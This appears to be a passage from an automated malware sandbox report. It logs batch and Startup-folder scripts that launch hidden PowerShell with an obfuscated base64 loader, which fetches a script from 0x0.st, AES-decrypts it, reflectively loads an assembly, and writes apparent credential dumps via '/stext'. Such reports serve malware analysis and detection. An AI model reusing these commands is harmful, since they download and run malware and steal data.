              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiB0Ym54ZigkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnOVZ1Sk54T3dDdTh6b1JRU2pyVi9XL2xObzVaR05qUW02SEZ6MXVoazRWUT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnY2pTTW92SXB3MGpxdUZpbDh4VFEvUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlbXVydSgkcGFyYW1fdmFyKXsJSUVYICckdWtjYWs9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckb2NraXk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkdWdzZD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR1a2NhaywgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZHVnc2QuQ29weVRvKCRvY2tpeSk7CSRkdWdzZC5EaXNwb3NlKCk7CSR1a2Nhay5EaXNwb3NlKCk7CSRvY2tpeS5EaXNwb3NlKCk7CSRvY2tpeS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGluZmRlKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR0ZHFzcD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJG5heXJxPSR0ZHFzcC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRuYXlycS5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JHNtaCA9ICRlbnY6VVNFUk5BTUU7JHZhbHhrID0gJ0M6XFVzZXJzXCcgKyAkc21oICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkdmFseGs7JG5zYnR1PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
              Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_6a9840ce.cmd" "
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_6a9840ce.cmd"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiB0Ym54ZigkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnOVZ1Sk54T3dDdTh6b1JRU2pyVi9XL2xObzVaR05qUW02SEZ6MXVoazRWUT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnY2pTTW92SXB3MGpxdUZpbDh4VFEvUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlbXVydSgkcGFyYW1fdmFyKXsJSUVYICckdWtjYWs9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckb2NraXk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkdWdzZD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR1a2NhaywgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZHVnc2QuQ29weVRvKCRvY2tpeSk7CSRkdWdzZC5EaXNwb3NlKCk7CSR1a2Nhay5EaXNwb3NlKCk7CSRvY2tpeS5EaXNwb3NlKCk7CSRvY2tpeS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGluZmRlKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR0ZHFzcD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJG5heXJxPSR0ZHFzcC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRuYXlycS5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JHNtaCA9ICRlbnY6VVNFUk5BTUU7JHZhbHhrID0gJ0M6XFVzZXJzXCcgKyAkc21oICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkdmFseGs7JG5zYnR1PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
              Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_2a9205f0.cmd" "
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\tOpxHK0Z2U.bat" Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiB0Ym54ZigkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnOVZ1Sk54T3dDdTh6b1JRU2pyVi9XL2xObzVaR05qUW02SEZ6MXVoazRWUT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnY2pTTW92SXB3MGpxdUZpbDh4VFEvUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlbXVydSgkcGFyYW1fdmFyKXsJSUVYICckdWtjYWs9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckb2NraXk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkdWdzZD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR1a2NhaywgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZHVnc2QuQ29weVRvKCRvY2tpeSk7CSRkdWdzZC5EaXNwb3NlKCk7CSR1a2Nhay5EaXNwb3NlKCk7CSRvY2tpeS5EaXNwb3NlKCk7CSRvY2tpeS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGluZmRlKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR0ZHFzcD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJG5heXJxPSR0ZHFzcC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRuYXlycS5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JHNtaCA9ICRlbnY6VVNFUk5BTUU7JHZhbHhrID0gJ0M6XFVzZXJzXCcgKyAkc21oICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkdmFseGs7JG5zYnR1PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\eguw"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\gaaojdm"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\qunhkwxnio"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_8b2957c5.cmd" Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiB0Ym54ZigkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnOVZ1Sk54T3dDdTh6b1JRU2pyVi9XL2xObzVaR05qUW02SEZ6MXVoazRWUT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnY2pTTW92SXB3MGpxdUZpbDh4VFEvUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlbXVydSgkcGFyYW1fdmFyKXsJSUVYICckdWtjYWs9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckb2NraXk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkdWdzZD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR1a2NhaywgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZHVnc2QuQ29weVRvKCRvY2tpeSk7CSRkdWdzZC5EaXNwb3NlKCk7CSR1a2Nhay5EaXNwb3NlKCk7CSRvY2tpeS5EaXNwb3NlKCk7CSRvY2tpeS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGluZmRlKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR0ZHFzcD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJG5heXJxPSR0ZHFzcC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRuYXlycS5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JHNtaCA9ICRlbnY6VVNFUk5BTUU7JHZhbHhrID0gJ0M6XFVzZXJzXCcgKyAkc21oICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkdmFseGs7JG5zYnR1PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_4f0470de.cmd" Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiB0Ym54ZigkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnOVZ1Sk54T3dDdTh6b1JRU2pyVi9XL2xObzVaR05qUW02SEZ6MXVoazRWUT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnY2pTTW92SXB3MGpxdUZpbDh4VFEvUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlbXVydSgkcGFyYW1fdmFyKXsJSUVYICckdWtjYWs9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckb2NraXk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkdWdzZD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR1a2NhaywgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZHVnc2QuQ29weVRvKCRvY2tpeSk7CSRkdWdzZC5EaXNwb3NlKCk7CSR1a2Nhay5EaXN